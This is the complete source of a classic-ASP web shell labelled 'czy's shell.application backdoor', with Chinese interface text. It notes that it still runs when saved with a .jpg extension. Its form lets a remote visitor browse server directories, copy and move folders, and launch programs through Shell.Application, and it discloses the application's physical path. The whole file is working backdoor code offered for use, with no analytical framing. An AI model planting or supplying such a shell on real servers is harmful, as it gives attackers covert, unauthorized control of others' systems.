扩展名是:.jpg 却能执行~~~???? <%response.write "<font size=6 color=red>一次只能执行一个操作:)</font>" %> <%response.write now()%><BR>程序所在的物理路径: <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> <html> <title>czy's shell.application backdoor </title> <body> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%= DSnXA %>"> 输入要浏览的目录<br> <input type=text name=text1 value="<%= DSnXA1 %>"> copy <input type=text name=text2 value="<%= DSnXA2 %>"><br> <input type=text name=text3 value="<%= DSnXA3 %>"> move <input type=text name=text4 value="<%= DSnXA4 %>"><br> 路径:<input type=text name=text5 value="<%= DSnXA5 %>"> 程序:<input type=text name=text6 value="<%= DSnXA6 %>"><br> <input type=submit name=sb value=发送命令> </form> </body> </html> <% DSnXA = Request.Form("text") '目录浏览 if (DSnXA <> "") then set shell=server.createobject("shell.application") '建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>" next end if %>
<% DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝 DSnXA2 = Request.Form("text2") if DSnXA1<>"" and DSnXA2<>"" then set shell1=server.createobject("shell.application") '建立shell对象 set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)="\" then path=left(DSnXA1,i-1) exit for end if next
if len(path)=2 then path=path & "\" path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write "command completed success!" end if %>
<% DSnXA3 = Request.Form("text3") '目录移动 DSnXA4 = Request.Form("text4") if DSnXA3<>"" and DSnXA4<>"" then set shell2=server.createobject("shell.application") '建立shell对象 set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)="\" then path=left(DSnXA3,i-1) exit for end if next
if len(path)=2 then path=path & "\" path2=right(DSnXA3,len(DSnXA3)-i) set fod2=shell2.namespace(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write "command completed success!" end if %> <% DSnXA5 = Request.Form("text5") '执行程序要指定路径 DSnXA6 = Request.Form("text6") if DSnXA5<>"" and DSnXA6<>"" then set shell3=server.createobject("shell.application") '建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write "command completed success!" end if